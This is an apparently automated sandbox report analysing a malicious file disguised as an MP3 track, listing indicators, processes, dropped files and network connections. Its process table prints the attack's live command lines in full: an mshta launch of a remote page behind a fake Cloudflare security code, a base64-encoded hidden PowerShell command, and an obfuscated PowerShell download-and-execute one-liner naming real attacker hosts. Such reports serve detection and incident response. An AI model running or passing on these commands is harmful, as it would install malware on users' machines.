download:

/

Full analysis: https://app.any.run/tasks/16e40077-8dd2-4450-9b8a-ca1b72f912ef
Verdict: Malicious activity
Analysis date: April 04, 2025, 14:27:46
OS: Windows 10 Professional (build: 19044, 64 bit)
Indicators:
MIME: audio/mpeg
File info: Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 128 kbps, 44.1 kHz, JntStereo
MD5:

302B94F6F12924C80C448626F98E578B

SHA1:

938AF1D0903AA81A6504C72EF3130C141E34E1C3

SHA256:

480DBECF96EE097D1B6CA930A05D8E8E4A1AE8F1BCFAB3885B48FAFBC77576B9

SSDEEP:

98304:nJI1ABLAc0xNxFqvaOYpCN+07C3dtHrsWPEtie38sc8T9VI7xQFxuPRsOWZbI+Fb:CB0ROrln9fhSbwiCGCuj5

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Changes powershell execution policy (Unrestricted)

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 5164)

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 5164)

    • Changes powershell execution policy

      • mshta.exe (PID: 7920)

    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 4164)

  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 8012)

    • BASE64 encoded PowerShell command has been detected

      • mshta.exe (PID: 7920)

    • Base64-obfuscated command line is found

      • mshta.exe (PID: 7920)

    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7920)
      • powershell.exe (PID: 5164)
      • powershell.exe (PID: 8012)

    • The process executes Powershell scripts

      • powershell.exe (PID: 8012)

    • The process bypasses the loading of PowerShell profile settings

      • mshta.exe (PID: 7920)

    • Converts a specified value to an integer (POWERSHELL)

      • powershell.exe (PID: 5164)
      • powershell.exe (PID: 8012)

    • Probably obfuscated PowerShell command line is found

      • powershell.exe (PID: 5164)

    • Application launched itself

      • powershell.exe (PID: 8012)

  • INFO

    • Reads Internet Explorer settings

      • mshta.exe (PID: 7920)

    • Checks whether the specified file exists (POWERSHELL)

      • powershell.exe (PID: 8012)

    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 8012)

    • Disables trace logs

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)

    • Checks proxy server information

      • mshta.exe (PID: 7920)
      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)
      • slui.exe (PID: 5868)

    • Creates or changes the value of an item property via Powershell

      • powershell.exe (PID: 5164)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 8012)
      • powershell.exe (PID: 4164)

    • Reads the software policy settings

      • slui.exe (PID: 5868)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.mp3 | LAME encoded MP3 audio (ID3 v2.x tag) (62.5)
.mp3 | MP3 audio (ID3 v2.x tag) (37.5)

EXIF

MPEG

MPEGAudioVersion: 1
AudioLayer: 3
AudioBitrate: 128 kbps
SampleRate: 44100
ChannelMode: Joint Stereo
MSStereo: Off
IntensityStereo: Off
CopyrightFlag: -
OriginalMedia:
Emphasis: None
VBRFrames: 10893
VBRBytes: 7012757
VBRScale: 80
Encoder: LAME3.99r
LameVBRQuality: 2
LameQuality: -
LameMethod: VBR (new/mtrh)
LameLowPassFilter: 18.5 kHz
LameBitrate: 32 kbps
LameStereoMode: Joint Stereo

ID3

Title: chilltrap
Artist: V-zen instrumental beat
Track: 55
RecordingTime: 2019
Genre: chillhop
SourceURL:
PublisherURL: http://www.jamendo.com
Publisher: http://www.jamendo.com
Composer: V-zen instrumental beat
UserDefinedText: (Tagging time) 2019-02-25T15:56:10
EncodedBy: Jamendo:http://www.jamendo.com| LAME
Comment: http://www.jamendo.com cc_standard
FileURL: http://www.jamendo.com/en/track/1624408
ArtistURL: http://www.jamendo.com/en/artist/343154
CopyrightURL: http://creativecommons.org/licenses/by-nc-nd/3.0/
Copyright: http://creativecommons.org/licenses/by-nc-nd/3.0/
PictureMIMEType: image/jpeg
PictureType: Front Cover
PictureDescription: -
Picture: (Binary data 14627 bytes, use -b option to extract)

Composite

DateTimeOriginal: 2019
AudioBitrate: 197 kbps
Duration: 0:04:45 (approx)
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
128
Monitored processes
7
Malicious processes
3
Suspicious processes
1

Behavior graph

Click at the process to see the details
start mshta.exe powershell.exe conhost.exe no specs powershell.exe no specs powershell.exe conhost.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1244\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4164"C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Exec Unrestricted -C SI Variable:/YXJ 'https://cf.jolttapestry.fun/7456f63a46cc318334a70159aa3c4291';SV bD ([Net.WebClient]::New());Set-Variable y9g (((([Net.WebClient]::New()|Member)|Where{(GV _).Value.Name -clike'D*g'}).Name));(GV bD -ValueOnl).((GV y9g -Value))((Get-Variable YXJ).Value)|.( ''.SubString.ToString()[3,29,30]-Join'') C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
5164"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -exec unrestricted -w 1 -File C:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
5868C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
7920"C:\Windows\System32\mshta.exe" http://run.fox-chair-dust.xyz/ # "CIoudfIare Security Code: 5P2NB-MJ7C-8KV6-D2VWC"C:\Windows\System32\mshta.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
8012"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABwAFEAeABNAHYAdwBzAHEAIAA9ACAAJwA2ADkANgA1ADcAOAA2ADgANwA0ADcANAA3ADAANwAzADMAQQAyAEYAMgBGADYARQA2AEYANwAwADYAMQA3ADMANwA0ADYANQAyAEUANgBFADYANQA3ADQAMgBGADYANgA2AEEANgBDADcAMwA2AEEANgA5ADYAMQA3ADUANgAyADcAOQA3ADYANgAzADcAMgA3ADMAMgBFADcAMAA3ADMAMwAxADIANAA3ADMANwA4ADcANQA0AEMANwA2ADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA3ADAANAA2ADQAQgA0ADgANgA1ADQAMgAyADgAMgA0ADQANgA2ADgANAA4ADYAOQAyAEMAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEAMgA5ADcAQgA2ADMANwA1ADcAMgA2AEMAMgAwADIANAA0ADYANgA4ADQAOAA2ADkAMgAwADIARAA2AEYAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEANwBEADMAQgA2ADYANwA1ADYARQA2ADMANwA0ADYAOQA2AEYANgBFADIAMAA2ADcANAAzADcAOQA0ADMANwAzADQARAA0ADUANwBBADIAOAAyADkANwBCADYANgA3ADUANgBFADYAMwA3ADQANgA5ADYARgA2AEUAMgAwADUANgA3ADUANQA0ADQANwA3ADkANwA1ADYAMQA2ADcAMgA4ADIANAA3ADAANQAxADcAOAA0AEQANwA2ADcANwA3ADMANwAxADIAOQA3AEIANgA5ADYANgAyADgAMgAxADIAOAA1ADQANgA1ADcAMwA3ADQAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgBEADUAMAA2ADEANwA0ADYAOAAyADAAMgA0ADQAMQA0ADQANAA3ADcAOAA0ADQANAA1ADUAQQAyADkAMgA5ADcAQgA3ADAANAA2ADQAQgA0ADgANgA1ADQAMgAyADAAMgA0ADcAMAA1ADEANwA4ADQARAA3ADYANwA3ADcAMwA3ADEAMgAwADIANAA0ADEANAA0ADQANwA3ADgANAA0ADQANQA1AEEANwBEADcARAAyADQANAAxADQANAA0ADcANwA4ADQANAA0ADUANQBBADIAMAAzAEQAMgAwADIANAA2ADUANgBFADcANgAzAEEANAAxADcAMAA3ADAANAA0ADYAMQA3ADQANgAxADIAMAAyAEIAMgAwADIANwA1AEMANgA2ADYAQQA2AEMANwAzADYAQQA2ADkANgAxADcANQA2ADIANwA5ADcANgA2ADMANwAyADcAMwAyAEUANwAwADcAMwAzADEAMgA3ADMAQgA1ADYANwA1ADUANAA0ADcANwA5ADcANQA2ADEANgA3ADIAMAAyADQANQA0ADQAOAA0ADUANAA4ADYARQA2AEQAMgBFADUAMwA3ADUANgAyADUAMwA3ADQANwAyADYAOQA2AEUANgA3ADIAOAAzADMAMgBDADMAMwAzADgAMgA5ADMAQgA3ADAANgBGADcANwA2ADUANwAyADcAMwA2ADgANgA1ADYAQwA2AEMAMgBFADYANQA3ADgANgA1ADIAMAAyAEQANgA1ADcAOAA2ADUANgAzADIAMAA3ADUANgBFADcAMgA2ADUANwAzADcANAA3ADIANgA5ADYAMwA3ADQANgA1ADYANAAyADAAMgBEADcANwAyADAAMwAxADIAMAAyAEQANAA2ADYAOQA2AEMANgA1ADIAMAAyADQANAAxADQANAA0ADcANwA4ADQANAA0ADUANQBBADMAQgA3AEQANgA3ADQAMwA3ADkANAAzADcAMwA0AEQANAA1ADcAQQAzAEIAJwA7ACQAVABIAEUASABuAG0APQAnACcAOwAgAGYAbwByACgAJABpAD0AMAA7ACQAaQAgAC0AbAB0ACAAJABwAFEAeABNAHYAdwBzAHEALgBMAGUAbgBnAHQAaAA7ACQAaQArAD0AMgApAHsAJABUAEgARQBIAG4AbQArAD0AWwBjAGgAYQByAF0AKABbAGMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEkAbgB0ADMAMgAoACQAcABRAHgATQB2AHcAcwBxAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkALAAyACkALAAxADYAKQApAH0AOwAgACYAIAAoACAAJABUAEgARQBIAG4AbQBbADAALgAuADIAXQAgAC0AagBvAGkAbgAgACcAJwAgACkAIAAoACAAJABUAEgARQBIAG4AbQBbADIAMgAuAC4AKAAkAFQASABFAEgAbgBtAC4ATABlAG4AZwB0AGgALQAxACkAXQAgAC0AagBvAGkAbgAgACcAJwAgACkAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
8020\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
16 948
Read events
16 931
Write events
17
Delete events
0

Modification events

(PID) Process:(7920) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(7920) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(7920) mshta.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableFileTracing
Value:
0
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableAutoFileTracing
Value:
0
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:EnableConsoleTracing
Value:
0
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileTracingMask
Value:
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:ConsoleTracingMask
Value:
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:MaxFileSize
Value:
1048576
(PID) Process:(4164) powershell.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation:writeName:FileDirectory
Value:
%windir%\tracing
Executable files
0
Suspicious files
2
Text files
9
Unknown types
0

Dropped files

PID
Process
Filename
Type
7920mshta.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\0PO2MYFN.mp3
MD5:
SHA256:
8012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0zvlewr1.wsw.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_3uzzk2es.hqs.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_y0c3rigi.jg1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4164powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCachebinary
MD5:8E7D26D71A1CAF822C338431F0651251
SHA256:495E7C4588626236C39124CCE568968E874BEDA950319BA391665B43DE111084
8012powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wkh5dm4v.2f1.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_qd1h5opw.hjb.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5164powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:AFE6FCE31FD7D574BB314C317DC5D7DB
SHA256:A4DD71F2695D81C115CE4934FBA367B2035165E4F565FF4A772862B41E164B27
4164powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_bbdc4ewa.zya.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
8012powershell.exeC:\Users\admin\AppData\Roaming\fjlsjiaubyvcrs.ps1text
MD5:20D8D688F642C10D5E822E4B77066E45
SHA256:A04C635DEAD3EFFAB39362F70773D2ABBF6C6EEE2081B87D5849508AA53CC667
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
23
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
5496
MoUsoCoreWorker.exe
GET
200
23.48.23.145:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
1660
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
1660
SIHClient.exe
GET
200
23.52.120.96:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
7920
mshta.exe
GET
200
188.114.97.3:80
http://run.fox-chair-dust.xyz/
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
5496
MoUsoCoreWorker.exe
23.48.23.145:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
7920
mshta.exe
188.114.97.3:80
run.fox-chair-dust.xyz
CLOUDFLARENET
NL
unknown
3216
svchost.exe
172.172.255.217:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
6544
svchost.exe
40.126.32.76:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
8012
powershell.exe
174.138.125.138:443
nopaste.net
DIGITALOCEAN-ASN
US
unknown
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.104.136.2
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.145
  • 23.48.23.147
  • 23.48.23.140
  • 23.48.23.158
  • 23.48.23.194
  • 23.48.23.161
  • 23.48.23.156
  • 23.48.23.139
  • 23.48.23.138
whitelisted
google.com
  • 142.250.186.142
whitelisted
run.fox-chair-dust.xyz
  • 188.114.97.3
  • 188.114.96.3
unknown
client.wns.windows.com
  • 172.172.255.217
whitelisted
login.live.com
  • 40.126.32.76
  • 40.126.32.138
  • 40.126.32.134
  • 40.126.32.136
  • 20.190.160.17
  • 20.190.160.14
  • 20.190.160.3
  • 20.190.160.2
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
nopaste.net
  • 174.138.125.138
unknown
cf.jolttapestry.fun
  • 188.114.97.3
  • 188.114.96.3
unknown
slscr.update.microsoft.com
  • 172.202.163.200
whitelisted

Threats

No threats detected
No debug info